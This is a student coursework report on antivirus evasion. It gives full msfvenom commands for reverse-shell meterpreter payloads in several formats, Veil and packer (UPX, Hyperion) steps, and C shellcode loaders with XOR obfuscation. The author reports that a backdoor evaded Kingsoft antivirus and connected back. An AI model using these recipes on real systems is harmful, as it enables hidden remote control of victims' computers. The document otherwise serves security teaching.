20212422 2023-2024-2 《网络与系统攻防技术》实验三实验报告

20212422陈睿 2024-04-03 16:26:25

目录

  • 1.实验内容
  • 1.1实践目标
  • 1.2 问题回答
  • 1.2.1 杀软是如何检测出恶意代码的?
  • 1.2.2 免杀是做什么?
  • 1.2.3 免杀的基本方法有哪些?
  • 1.3 实验环境
  • 2.实验过程
  • 2.1 正确使用msf编码器,使用msfvenom生成如jar之类的其他文件
  • 2.1.1 多次编码
  • 2.1.2 不同输出格式
  • 2.2 Veil-Evasion
  • 2.2.1 下载Veil
  • 2.2.2 使用Veil构造payload
  • 2.2.3 分析生成的payload
  • 2.3 加壳
  • 2.3.1 压缩壳
  • 2.3.2 加密壳
  • 2.4 C+shellcode编程
  • 2.5 通过组合应用各种技术实现恶意代码免杀
  • 2.5.1 C+shellcode编程
  • 2.5.2 C+shellcode+异或
  • 2.5.3 C+shellcode+异或+加密壳
  • 2.5.4 C+shellcode+异或+加密壳+压缩壳
  • 2.6 用另一电脑实测,在杀软开启的情况下,可运行并回连成功
  • 4. 问题及解决方案
  • 4.1 安装Veil的问题(最大的难题っ◞‸◟c)
  • 4.1.1 Kali镜像选择
  • 4.1.2 安装veil
  • 4.1.2.1 虚拟机快照
  • 4.1.2.2 安装过程
  • 4.2 /var/cache/apt/archives/内存不足问题:
  • 4.3 Unable to create output file问题
  • 5.实验感想
(20212422 2023-2024-2 《网络与系统攻防技术》实验三实验报告)

1.实验内容

1.1实践目标

(1)正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧

正确使用msf编码器,使用msfvenom生成如jar之类的其他文件
veil,加壳工具
使用C + shellcode编程
(2)通过组合应用各种技术实现恶意代码免杀

如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。

(3)用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

1.2 问题回答

1.2.1 杀软是如何检测出恶意代码的?

  • 签名检测:这是最传统的方法,依赖于一个不断更新的恶意软件签名数据库。杀软通过比对文件的特征码(签名)与已知恶意软件的特征码进行匹配来检测恶意代码。
  • 行为分析:杀软监控程序的行为,包括对文件、网络、系统资源的访问和修改。如果软件的行为模式与已知的恶意行为模式匹配,则可能被判定为恶意软件。
  • 启发式分析:利用启发式算法分析未知软件的行为和代码结构,尝试发现未知的或变种的恶意软件。这种方法不仅仅依赖于已知的恶意软件数据库,而是尝试识别新的威胁。
  • 沙箱执行:在一个隔离的环境(沙箱)中执行程序,分析其行为,从而不对实际系统造成影响。如果程序在沙箱中表现出恶意行为,那么它就可能被识别为恶意软件。
  • 云检测:借助云计算技术,杀软可以迅速分析大量数据,识别新出现的恶意软件。这种方法可以有效地提高检测的速度和准确性。

    1.2.2 免杀是做什么?

  • 免杀是指通过各种技术手段避免恶意软件被杀毒软件检测到的行为。这通常涉及到对恶意软件代码的修改,使其能够绕过安全软件的检测机制,从而在未被发现的情况下在目标系统上执行。

    1.2.3 免杀的基本方法有哪些?

    ①改变特征码
  • 加壳
  • 用encode进行编码
  • 用其他语言进行重写再编译

②改变行为

  • 改变通讯方式
    • 尽量使用反弹式连接
    • 使用隧道技术
    • 加密通讯数据
  • 改变操作模式
    • 基于内存操作
    • 减少对系统的修改

③非常规方法

  • 使用一个有漏洞的应用当成后门,编写攻击代码集成到如MSF中
  • 使用社工类攻击,诱骗目标关闭AV软件
  • 纯手工打造一个恶意软件

1.3 实验环境

可疑文件分析网站,能够分析一个PE文件的免杀效果:
https://www.virustotal.com/gui/home/upload

2.实验过程

2.1 正确使用msf编码器,使用msfvenom生成如jar之类的其他文件

使用实验环境中的网站检测实验二中生成的后门程序:

在这里插入图片描述


在这里插入图片描述

2.1.1 多次编码

//编码1次,IP地址为Kali的IP地址
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 1 -b '\x00' LHOST=192.168.163.129 LPORT=2422 -f exe > 20212422_encode1.exe

//编码10次
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.163.129 LPORT=2422 -f exe > 20212422_encode10.exe

//编码22次
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 22 -b '\x00' LHOST=192.168.163.129 LPORT=2422 -f exe > 20212422_encode22.exe

#修改编码次数,只需要修改 -i之后的那个数字即可

在这里插入图片描述


生成的三个文件分别是编码1次、10次、22次的文件。

对应的VirusTotal检测结果如下:

  • 编码1次

    在这里插入图片描述

  • 编码10次

    在这里插入图片描述

  • 编码22次

    在这里插入图片描述

据观察,变是有变化,但是感觉多次编码与免杀效果有什么必然关系,数值基本都很大,而且变化也不大。

2.1.2 不同输出格式

#输出jar文件,IP地址是Kali虚拟机IP
msfvenom -p java/meterpreter/reverse_tcp -b '\x00' LHOST=192.168.163.129 LPORT=2422 x> jar_20212422.jar 
 
 #输出php文件
msfvenom -p php/meterpreter/reverse_tcp -b '\x00' LHOST=192.168.163.129 LPORT=2422 x> php_20212422.php
 
 #输出python文件
msfvenom -p python/meterpreter/reverse_tcp -b '\x00' LHOST=192.168.163.129 LPORT=2422 x> python_20212422.py 
 
 #输出apk文件,运行于android系统
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.163.129 LPORT=2422 x> apk_20212422.apk 

在这里插入图片描述


在这里插入图片描述


利用virusTotal判断,免杀效果如下:

  • jar文件

    在这里插入图片描述

  • php文件

    在这里插入图片描述

  • py文件

    在这里插入图片描述

  • apk文件

    在这里插入图片描述

据上述virusTotal测试结果可知,py的免杀效果相对最好,php文件和apk文件差不多,最差的是jar文件。
可见,payload对免杀的效果是有影响的,而且python作为payload的效果比较好,可能跟解释性语言的特性有些关系。

  • 接下来,我换了一个做法,使用以下命令:
    #payload从反向连接换成了反向tcp_ssl连接,并且采输出用raw文件
    msfvenom -p python/meterpreter/reverse_tcp_ssl LHOST=192.168.163.129 LPORT=2422 -f raw > ssl_20212422.py 
    
    检测结果如下:

    在这里插入图片描述


    在这里插入图片描述

发现免杀率进一步提高了。
上图显示McAfee、Tencent等杀毒软件都没有发现病毒,说明这个文件很有希望在大众使用的电脑上实现免杀。

2.2 Veil-Evasion

2.2.1 下载Veil

这是实验中最最最最难受的一步,我在经过了无数次的失败之后,终于安装成功了。
详细步骤在问题及解决方案中给出

2.2.2 使用Veil构造payload

使用如下命令:

#使用流程
veil #进入veil工具
use evasion #选择使用evasion模块
use c/meterpreter/rev_tcp.py #选择payload
#也可以先用“list”查看所有可选择的payload,然后直接使用“use+payload序号”来进行选择
set LHOST 192.168.163.140 #设置IP
set LPORT 2422 #设置端口
generate #执行payload
c_20212422veil #输入生成文件的名称
  • 下面截图是生成 c/meterpreter/rev_tcp.py的过程截图:

    在这里插入图片描述


    在这里插入图片描述

  • 除此之外,我还使用了ruby/meterpreter/rev_tcp.py和python/meterpreter/rev_tcp.py三种payload

    请添加图片描述


    在生成ruby/meterpreter/rev_tcp.py的时候,可能会遇到下面的这个问题:

    在这里插入图片描述


    使用如下命令即可解决:
    //地址就是上述问题中提示的“not owned by you”前面提示的地址
    sudo chown root:root -R /var/lib/veil/wine
    

    2.2.3 分析生成的payload

  • c_20212422veil.exe:

在这里插入图片描述

  • ruby_20212422veil.exe:

在这里插入图片描述

  • py_20212422veil.exe:

在这里插入图片描述

  • 结论:Veil-Evasion的免杀效果与msfvenom相比差别不大,常用的payload免杀效果都不是太理想。同样的,ruby和python的免杀效果就比常用的c等要好。

2.3 加壳

2.3.1 压缩壳

apt-get install upx
//可以生成一个test.exe文件便于测试
upx 20212422_test.exe -o 20212422_upx1.exe

在这里插入图片描述


在这里插入图片描述

进行检测:

请添加图片描述


编码1次的检测数值是58,似乎加壳之后数值降了一些,但是降的不多。

2.3.2 加密壳

利用Hyperion对文件进行加密,并利用virusTotal进行免杀效果测试
命令如下:

//将待加密程序拷贝到工作目录下
cp 20212422_test.exe /usr/share/windows-resources/hyperion/    

//进入工作目录下
cd /usr/share/windows-resources/hyperion

//前者为待加密程序名,后者为加密后程序名
wine hyperion.exe -v 20212422_encode1.exe 20212422_hyp.exe 

在这里插入图片描述


在这里插入图片描述


在这里插入图片描述

进行免杀测试:

在这里插入图片描述


感觉有一些效果,但是效果不大。

2.4 C+shellcode编程

  • 使用msfvenom生成一个shellcode数组,然后使用该数组编写一个c语言程序
#生成Shellcode
msfvenom -p windows/meterpreter/reverse_https -e x86/bloxor LHOST=192.168.163.140 LPORT=2422 -f c

#编写程序
vim 20212422_shellcode.c #进入vim编辑器,没有文件会新建
#程序内容如下:
    unsigned char buf[] = "生成的shellcode";
    int main()
    {
        int (*func)() = (int(*)())buf;//buf强转成函数型指针
        func();
    }
#编译器在64位系统上构建32位应用程序
i686-w64-mingw32-g++ 20212422_shellcode.c -o 20212422_shellcode.exe
  • 生成shellcode

在这里插入图片描述


在这里插入图片描述


在这里插入图片描述

  • 使用以下命令进行编译:
#编译器在64位系统上构建32位应用程序
i686-w64-mingw32-g++ 20212422shell.c -o 20212422shell.exe

在这里插入图片描述


在这里插入图片描述

  • 进行免杀测试

在这里插入图片描述


从数值上分析,C+shellcode的免杀效果要比之前的好。

2.5 通过组合应用各种技术实现恶意代码免杀

2.5.1 C+shellcode编程

#先把处理后的文件输出为raw格式,再将第一步的输出结果作为输入传递给msfvenom
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.163.140 LPORT=2422 -b '\x00' -e x86/shikata_ga_nai -i 10 -f raw | msfvenom -a x86 --platform windows -b '\x00' -e x86/bloxor -i 2 -f c
  • 把处理后的文件输出为raw格式,再将第一步的输出结果作为输入传递给msfvenom

在这里插入图片描述


在这里插入图片描述

2.5.2 C+shellcode+异或

  • 进行如下操作:
#对20212422XOR.c文件进行编辑,该文件的作用是输出异或后的shellcode到20212422XOR.txt中
vim 20212422XOR.c  
#20212422XOR.c文件内容
#此文件用gcc 20212422XOR.c -o 20212422XOR.out和./20212422XOR.out来运行
#include<stdio.h>
#include <stdlib.h>
unsigned char buf[] = "异或前的shellcode";
int main()
{
    FILE *fptr;
    fptr = fopen("20212422XOR.txt", "w");
    int i;
    for (i = 0; i < sizeof(buf)-1; i++)
    {
        buf[i] ^= 0x01;
        fprintf(fptr,"\\x%x", buf[i]);
    }
    if(fptr == NULL)
    {
        printf("Error!");
        exit(1);
    }
    fclose(fptr);
    return 0;
}

在这里插入图片描述


在这里插入图片描述

  • 接下来进行C+shellcode操作
#进入cr.c文件
vim cr.c

#该文件编译用
i686-w64-mingw32-g++ cr.c -o cr.exe
#cr.c文件内容
unsigned char buf[] = "异或后的shellcode";
int main()
{
    int i;for (i = 0; i < sizeof(buf); i++)
     {
         buf[i] ^= 0x01;
    }
    int (*func)() = (int(*)())buf;
    func();
}

在这里插入图片描述


在这里插入图片描述


在这里插入图片描述

  • 对cr.exe文件进行免杀检测:

在这里插入图片描述

2.5.3 C+shellcode+异或+加密壳

  • 加密壳操作,使用Hyperion对文件进行加密
cp cr.exe /usr/share/windows-resources/hyperion/
cd /usr/share/windows-resources/hyperion
wine hyperion.exe -v cr.exe cr_hyp.exe

在这里插入图片描述

  • 免杀检测结果

在这里插入图片描述


发现,在进行加密壳处理之后,数值反而大幅上升。

2.5.4 C+shellcode+异或+加密壳+压缩壳

  • 将2.5.3中生成的cr_hyp.exe做压缩壳处理:
upx cr_hyp.exe -o cr_hyp_upx.exe

在这里插入图片描述

  • 免杀检测结果

在这里插入图片描述


发现再进行压缩壳处理之后免杀效果仍不太理想。

2.6 用另一电脑实测,在杀软开启的情况下,可运行并回连成功

  • 在进行这步操作时,我使用了金山毒霸杀软,以下是详细信息:

在这里插入图片描述


之后的操作都在该杀软开启的情况下进行操作。

  • 用自己的Win10主机作为另一台电脑。
    在Veil-Evasion中选择cs/shellcode_inject/virtual.py
    输入generate,进行参数配置

请添加图片描述

  • 将生成的cr_backdoor.exe文件传到Win10主机上。

请添加图片描述


在这里插入图片描述


在这里插入图片描述

  • 在Linux端输入exploit运行监听模块,并在Windows终端运行后门cr_backdoor.exe文件(实验二操作)
    • 先监听,再运行后门文件

在这里插入图片描述


在这里插入图片描述

  • 所有操作进行时金山毒霸均没有报警,操作成功!
  • 随后我对后门文件所在目录进行查杀,发现了一个病毒,但是这个病毒是我实验二的时候生成的后门文件20212422_backdoor.exe,而不是本实验生成的后门文件cr_backdoor.exe。

在这里插入图片描述

  • 至此,本次实验圆满结束!

  • P.S.

    • 在进行最后一步的时候,我还尝试使用了火绒安全软件,结果刚把cr_backdoor.exe文件传到Win10主机,马上就被火绒截获。
    • 我使用火绒进行自定义查杀,发现除了实验二和三生成的两个.exe文件外,甚至连ncat文件都被拦截了。

在这里插入图片描述

在这里,我不得不感慨火绒确实很强大,但是也侧面体现出,金山毒霸杀毒软件的病毒库确实不怎么强大。
(在主机里下载金山毒霸,感觉还是需要很大的勇气的• .•̀)

4. 问题及解决方案

4.1 安装Veil的问题(最大的难题っ◞‸◟c)

  • 这是本次实验中遇到的困难最多,最折磨也是最难受的问题,这一步安装不成功会导致整个实验无法进行。
    为了解决veil安装问题,我几乎将所有能尝试的方法都试了个遍,虚拟机重新安装了无数次,但是依然没能解决。
    • 起先一直是Python3.4.4不成功的问题,就是图形化的安装界面一直不出现,有一次运气好出现了,但是在安装的时候点击next就卡住了,一直没反应。使用**/usr/share/veil/config/setup.sh --force --silent**这句指令也完全没用,Python死活安装不下来。
    • 我在网上查询后,认为是64位系统的兼容性问题导致下载不了wine,所以先是用sudo dpkg --add-architecture i386开启i386支持,发现无法解决。
    • 然后我又重新换了一台32位的Kali虚拟机,惊喜的发现python安装居然能一直next了!但是,又卡在了ruby1.8.7的安装上,问题也和python3.4.4类似,不出现图形化安装界面,一直失败 ˃̣̣̥᷄⌓˂̣̣̥᷅
    • 最后,我甚至采用docker拉取的方法尝试了一遍,但是docker拉取不了,所以也没法安装veil。
      但是最后我还是安装成功了,感觉是因为我从根源上就解决了问题:原本我用的是2023.4版本的amd64的Kali镜像,在换成了2022-2的Kali镜像文件,重装虚拟机,然后所有的问题就迎刃而解了。
  • 以下是我的详细问题解决及安装步骤:

    4.1.1 Kali镜像选择

  • 我这里推荐选择2022.2版本的amd64的Kali镜像,可能背后有一些特殊的兼容性问题,但是在我的数次尝试下,只有这个版本的Kali我能成功安装veil。
  • 多版本Kali镜像下载网站:
    https://old.kali.org/kali-images/

在这里插入图片描述

4.1.2 安装veil

  • 在安装正确版本的Kali虚拟机之后,问题几乎就少了一大半。

4.1.2.1 虚拟机快照

  • 这里推荐使用VMware的虚拟机快照功能,使用快照可以再进行安装的关键操作前,保存一个当前状态,一旦之后出现安装问题,可以快速回到快照保存的状态进行操作,避免了重复重装虚拟机等繁杂操作。
  • 拍摄快照(保存当前状态)

    请添加图片描述

  • 管理快照和回到某个快照节点

    请添加图片描述

  • 选择对应位置点击转到就能快速回到某个时间点

    在这里插入图片描述


    也可以在左上角的“虚拟机——快照”里进行对应操作。

4.1.2.2 安装过程

  • 首先,两个命令,以便于后续veil中的安装能顺利进行。
    sudo apt-get install pip
    sudo apt-get install git
    
  • 接下来,进行正常的安装,推荐跟着以下教程一步一步走,不跳步,也不进行其他无关操作(不用换源,不断网)。
    Veil安装、启动、Can‘t find the WINE profile问题
  • 一旦失败,就回到之前操作的快照,重复进行操作

跟着教程结束之后,veil就能够顺利使用了,最复杂,最费时间的问题在此刻解决!ᖘ ❛‿˂̵✧

在这里插入图片描述

4.2 /var/cache/apt/archives/内存不足问题:

  • 在安装veil的时候,因为所需要的空间比较大,可能会出现you don't have enough free space的问题
    • 这时候,就可以采用以下方法尝试解决
      解决内存不足问题
    • 如果还是不能解决,那就检查自己存放虚拟机的硬盘空间是否足够,建议在安装虚拟机的时候,选择一个空间比较大的盘(极其不推荐直接放在C盘里,装veil的时候C盘肯能会爆红,本机和Kali都可能会变得很卡)

4.3 Unable to create output file问题

  • 使用Veil在生成ruby/meterpreter/rev_tcp.py的时候遇到的无法生成.exe文件的问题

    在这里插入图片描述


    使用如下命令即可解决(修改权限):
    //地址就是上述问题中提示的“not owned by you”前面提示的地址
    sudo chown root:root -R /var/lib/veil/wine
    

5.实验感想

  本次实验是网络与系统攻防技术的第三次实验,本次实验中,我接触了一些免杀工具,也学习了msf编码、veil免杀、加壳等一系列的免杀方法。总体上来说,本次实验的内容还是很有意思的,特别是当自己用不同payload的文件放到VirusTotal网站里进行检测,看着或相似或差别很大的免杀数值的时候,确实是有那么一点“菜鸟黑客”的感觉了。
  这次实验我的大部分时间都花费在安装veil上,在遇到许多奇奇怪怪的Error的同时,我也非常深刻地意识到了不能什么都靠CSDN,有很多问题根本没法解决,跟着某些“大神”的操作甚至能把报错红一行变成红十行,直接原地爆炸(这里就体现了快照的作用了,最起码不用重装虚拟机⁼̴̀ .̫ ⁼̴)。
  在做这次实验的时候我也参考了很多学长学姐的报告,在对比一年前VirusTotal的免杀检测结果和现在的结果的时候,真的有意识到现在恶意代码和杀软的发展都是十分迅速的,一年前用ruby生成的payload免杀检测数值降低是很明显的,甚至能降到个位数,但是当现在我再去尝试的时候,发现数值并不低,也就是说杀软的功能越来越强大,免杀也变得越来越困难,看来在扎实基础、紧跟时代,才是学习的真谛啊ヽ( °▽゚)ノ

...全文
75 回复 打赏 收藏 转发到动态 举报
写回复
用AI写文章
回复
切换为时间正序
请发表友善的回复…
发表回复
网络信息安全综合实验 任 务 书 一、 目的与要求 根据实验内容的要求和实验安排,要求学生在掌握网络信息安全基本知识的基础上, 能够设计出相应的软件,并且熟练地运用各种网络信息安全技术和手段,发现并解决各 类安全问题,维护网络及操作系统的安全。 二、 主要内容 实验一加密认证通信系统实现 设计实现一个通信系统,双方可以通过消息和文件通信,用户可选择一种加密算法和 认证算法,对消息和文件进行加密通信和完整性验证。(要实现认证和加密,工具和语 言不限,可以直接调用现有模块,认证和加密不限) 实验二 综合扫描及安全评估 利用常见的一些扫描工具可以检测本系统及其它系统是否存在漏洞等安全隐患,给出 全面而完善的评估报告,帮助管理员发现存在的问题,进而采取有力措施予以弥补,从 而提高系统的安全性能。 实验三 网络攻防技术 矛与盾的关系告诉我们,在研究网络安全技术时,只着眼于安全防范技术是远远不够 的,知己知彼方能百战不殆,因此,很有必要同时研究攻击与防范技术,才能更有效地 解决各种威胁。 实验四 Windows系统安全配置方案 作为网络节点,操作系统安全成为网络信息安全首先应予考虑的事务,然而人们往往 忽视了OS的安全性。其实,OS的安全不只体现在密码口令上,这仅仅是最基本的一个方 面。除此之外,服务、端口、共享资源以及各种应用都很有可能存在着安全隐患,因此 ,应采取相应措施设置完善的本地安全策略,并使用防病毒软件、防火墙软件甚至入侵 检测软件来加强系统的安全。 其中实验一要求编程实现,可直接调用相关功能函数完成。实验二至实验四可在机房 的网络信息安全综合实验系统上完成。 三、 进度计划 "序号 "设计(实验)内容 "完成时间 "备注 " "1 "接受任务,查阅文献,开始实 "第一天 " " " "现密码算法和认证算法 " " " "2 "完成加密认证通信系统 "第二至七天 " " "3 "上午完成综合扫描及安全评估 "第八天 " " " "实验,下午进行网络攻防实验 " " " "4 "上午完成网络攻防实验,下午 "第九天 " " " "进行系统安全配置实验 " " " "5 "撰写实验报告并验收 "第十天 " " 四、 实验成果要求 1. 要求程序能正常运行,并实现任务书要求功能。 2. 完成实验报告,要求格式规范,内容具体而翔实,应体现自身所作的工作,注重 对设计思路的归纳和对问题解决过程的总结。 五、 考核方式 平时成绩+程序验收+实验报告。 学生姓名: 指导教师: 2016 年 6 月 13 日 实验报告 题 目: 网络信息安全综合实验 院 系:计算机系 班 级: 学 号: 学生姓名: 指导教师: 成 绩: 实验日期:2021 年 6 月 一、 目的与要求 根据实验内容的要求和实验安排,要求学生在掌握网络信息安全基本知识的基础上, 能够设计出相应的软件,并且熟练地运用各种网络信息安全技术和手段,发现并解决各 类安全问题,维护网络及操作系统的安全。 二、 实验内容 设计实现一个通信系统,双方可以通过消息和文件通信,用户可选择一种加密算法和 认证算法,对消息和文件进行加密通信和完整性验证。(要实现认证和加密,工具和语 言不限,可以直接调用现有模块,认证和加密不限) 三、实验结果 实验一:本通信系统为用C#语言编写的P2P方式通信的系统,其具体功能如下: 1、识别本机IP地址并赋值到文本框中,产生一个随机数作为端口号,端口号范围限制在 1000到65535之间。 2、通过运用网络编程的知识尝试用产生的IP与端口号进行监听。 图1 发送方界面 图2 接收方界面 3、设置刷新区域,定时刷新好友在线,可以设置刷新间隔,启动和停止刷新。这里 可以通过拖拽VS里自带的控件"timersecond",实现计时。 4、发送消息。消息的传送是具有加密与认证的。 加密:考虑到DES的安全性问题,加密消息是采用AES方式加密的,本系统采用的是 C#封装好的AES程序,调用接口,实现对明文的加密。解密同理。 认证:认证是将明文哈希散列后采用RSA算法对其进行签名,再用公钥加密进行认证 的,其中哈希散列采用的是SHA1方式。下图为加密与认证的具体流程。 图3 加密与认证流程 图4 发送方可显示明文与密文 图5接收方解密出明文 5、可以发送文件。通过获取文本框中的文件地址,建立文件流,向接收端发送文件 。 接收端进行文件监听,接收文件,与发送文件编写过程相似,只是把"写"换成了"读"文 件。VS里自带的控件"saveFileDialog"可以帮助用户提示选择保存文件的位置。 图6 输入文件位置 图7 询问是否接受文件 图8 接收与发送文件成功 实验二:认识性实验 本实验为认识练习信息安全实验平台的部分实验。 SuperScan端口扫描实验 扫描结果如下图: 图
网络安全实验 石河子大学信息科学与技术学院 网络安全课程实验 "实验名称: "使用任选工具进行网络检测与扫描 " "学生姓名: "刘金红 " " "学 号: "05 " " "学 院: "信息科学与技术学院 " "专业年级: "计算机科学与技术专业2012级 " "指导教师: "曹传东老师 " "完成日期: " " 目录 1 实验环境 3 2 实验目的 3 3 实验步骤 3 4 实验内容 4 DOS窗口中常用网络命令的操作使用及IPCS攻击实践 4 DOS窗口中ping 命令及其常见带参数子命令的用法实践 4 DOS窗口中IPconfig 命令及其常见带参数子命令的用法实践 6 DOS窗口中nslookup命令及其常见带参数子命令的用法实践 8 DOS窗口中netstat命令及其常见带参数子命令的用法实践 10 DOS窗口中arp命令及其常见带参数子命令的用法实践 12 DOS窗口中route命令及其常见带参数子命令的用法实践 13 DOS窗口中tracert命令及其常见带参数子命令的用法实践 14 DOS窗口中ftp命令及其常见带参数子命令的用法实践 15 DOS窗口中telnet命令及其常见带参数子命令的用法实践 16 DOS窗口中sc命令及其常见带参数子命令的用法实践 20 DOS窗口中nbtstat命令及其常见带参数子命令的用法实践 22 DOS窗口中net命令及其常见带参数子命令的用法实践 24 DOS窗口中at命令及其常见带参数子命令的用法实践 25 使用课本第四章各案例中介绍的工具软件进行网络信息收集和扫描检测 25 在虚拟机系统Window200x中使用GetNTuser工具扫描本机系统上存在的用户名, 并猜解其中具有空密码和弱口令的用户;在该软件中使用自定义字典文件穷举猜 解某个用户的口令(爆破); 25 使用Port Scan 工具软件进行对某目标机开放端口的扫描; 28 在虚拟机系统中使用Shed 工具软件扫描某个目标主机的共享目录信息; 31 编译执行课本中案例4-4介绍的代码,并利用抓包工具进行验证; 32 使用漏洞扫描工具X-Scan对指定IP 地址段或单机进行全面的安全漏洞扫描和检测; 36 使用嗅探工具Win Sniffer 监听客户端登陆FTP服务器的用户和密码信息; 39 使用自选的任一款扫描工具进行网络攻击前的信息收集 42 使用CIS工具对本机系统进行安全风险评估 42 使用Superscan扫描工具实现秘密端口扫描 44 实验一:使用任选工具软件进行网络检测和扫描 1 实验环境 1台带有活动网络连接(插有网卡且工作正常)、安装有VMware虚拟机软件的PC机,其中 主机环境配置如表1-1所示: 表1-1 本机环境:主机操作系统的配置(作为客户机端) "操作系统 "Windows系列操作系统,版本均可,推荐Win7/Windows XP " "Telnet客户端 "F-Term(版本不限)或 " "工具 " " "FTP客户端工具"Cute FTP pro/Flash FXP (版本不限)或 " "Web浏览器 "IE/Mozilla FireFox(版本不限)或其他浏览器软件 " "抓包软件 "Sniffer Pro 支持千兆网卡) " "屏幕截图工具 "HyperSnap-DX (可抓滚屏的单文件版本) " "IP地址 " (机房做的) (后来改了) " 虚拟机配置如下表1-2所示: 表1-2 虚拟机环境:虚拟机操作系统的配置(作为服务器端) "操作系统 "Windows 200X Advance " " "Server,且安装配置了WWW/FTP/DNS/Telnet等网络服务 " "IP地址 " " 2 实验目的 1. 通过该实验,掌握在DOS命令窗口中常用网络命令的使用方法; 2. 通过该实验,掌握利用教程第四章介绍的各个案例中的工具软件进行网络检测扫描的 基本方法; 3. 通过该实验,掌握使用自选的一款工具软件进行网络攻击前的信息收集的基本方法; 4. 进一步加深对TCP/IP协议的理解和认识; 3 实验步骤 1. 实验前先阅读材料相关章节以及实验一参考资料(PPT及命令简介文档、实验指导书) ,充分预习,了解实验步骤并准备相关的工具软件; 2. 每个人在自己的本机系统上安装各种工具软件,以自己的虚拟机系统作为扫描目标; 3. 在各工具软件中分别进行参数设置,以实现客户机端获取靶机服务器的各种信息; 4. 在虚拟机系统中启动Sniffer Pro 或Wireshark,进行数据包捕获模式,抓取攻防双方的各种通信协议数据包,查看数 据包中的各种敏感扫描信息的报文内容; 5. 独立完成本次实验报告; 6. 实验完成后,思考以下问题,如何防范对方从网络上获得自己机器的各种信息 4
xxxxxxx 学生实习(实训)总结报告 学 院:xxxxxxxxxxxxxxxxxx 专业班级:_xxxxxxxxxx_ 学生姓名:____xxxxxxxxx_____ 学 号:xxxxxxxxxx_ 实习(实训)地点:___xxxxx____ ____________ __ 报告题目:__xxxxxxxxxxxxxxxxxxxx__________ ____ 报告日期: xxx 年 xxx月 xxx日 指导教师评语: ____________ _______________________ ______________________________________________________________________ ______________________________________________________________________ ___________________ 成绩(五级记分制):______ _______ 指导教师(签字):_____________________ xxxxx 实习(实训)任务书 设计题目:数据恢复技术应用 "学生姓名 "xxxxx " "课程名称 "xxxxx "专业班级 "xxxxx " "地 点 "xxxxx "起止时间 "xxxxx " "设 "数据恢复是在系统数据丢失或其他诸多原因而导致的灾难后,快速进" "计 "行数据恢复,以保障系统正常运行的常用手段。通过该综合训练,使" "内 "学生了解数据恢复的重要性,并认识到电磁泄漏现象引起的数据恢复" "容 ",硬件损坏、文件的删除等实现数据恢复的内容。 " "及 "要求:理解数据备份的重要性,以及磁盘数据恢复的原理,认识数据" "要 "恢复技术对信息安全的影响。能够使用数据恢复软件EasyRecovery进" "求 "行文件恢复。 " " "提高要求:能够对磁盘数据进行彻底清除。 " "设 "掌握EasyRecovery的应用; " "计 "理解磁盘分区的原理及特征; " "参 "设计利用EasyRecovery或手动方法进行数据恢复的解决方案。 " "数 " " "进 "12月19-20日:了解设计任务、掌握磁盘分区特征、熟悉工具软件;" "度 "12月21-28日:数据恢复的实施; " "要 "12月29-30日:撰写综合训练总结报告,作品检查、提交、答辩。 " "求 " " "参 "[1] 吴灏.《网络攻防技术》[M].北京:机械工业出版社,2009. " "考 "[2]胡建伟.《网络安全与保密》[M]. 西安电子科技大学出版社,2006." "资 "[3]牛少彰,江为强.《网络的攻击于防范——理论与实践》[M]. 北京: " "料 "北京邮电大学出版社,2006. " " "[4] 蒋朝惠. 《信息安全综合实验》[M]. " " "北京:中国铁道出版社,2010. " " "[5] 蒋朝惠. 《信息安全原理与技术》[M]. " " "北京:中国铁道出版社,2009. " "其 " " "它 " " "说 " " "明 "1.本表应在每次实施前一周由负责教师填写二份,院系审批后交院 " " "系办备案,一份由负责教师留用。2.若填写内容较多可另纸附后。3" " ".一题多名学生共用的,在设计内容、参数、要求等方面应有所区别 " " "。 " 系主任: 指导教师:xxxxx 年 月 日 前言 随着计算机技术的发展,同时硬盘由于其容量大价格便宜也成为人们存储数据的主要 设备。然而由于种种原因,硬盘的数据可能会被损坏,这也给个人和社会带来很大的损 失。因此,数据损坏后的数据恢复显得非常重要。虽然在数据恢复领域有很多的厂商已 经有比较成熟的技术。然而对于并不了解硬盘原理普通人来说,如果试图恢复数据,但 又无法采用很好的方法,选择正确的工具,就很难很好的恢复数据。然而不管用什么方 法进行数据恢复,都不能保证100%的能成功,所以在使用电脑时,我们应该注意数据备 份工作。 本文分析了硬盘的有关内部结构与文件存储系统以及硬盘数据损坏的有关原因,然后 介绍如何使用数据恢复软件EasyRecovery进行文件恢复。 目录 前言 I 1 设计内容及要求 1 实训内容 1 实训要求 1 2 数据恢复原理 2 3 数据恢复常见实例 4 主引导区的恢复 4 分区表破坏修复 5 DBR修复 5 文件删除后的修复 6 因病毒侵害而导致的文件丢失 6 利用EasyRecovery恢复丢失文件 7 4 总结 14 致谢 15 参考文献 16 1 设计内容及要求 硬盘数据丢失对于硬盘来说,仅仅就是硬盘上的某些地方的磁性消失。硬盘数据的丢 失的原因本来就有很多种,可能因为人的误操作而丢失,也可能是因为病毒的入侵而破 坏数据。并且

69

社区成员

发帖
与我相关
我的任务
社区描述
网络攻防作业
网络安全 高校
社区管理员
  • blackwall0321
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧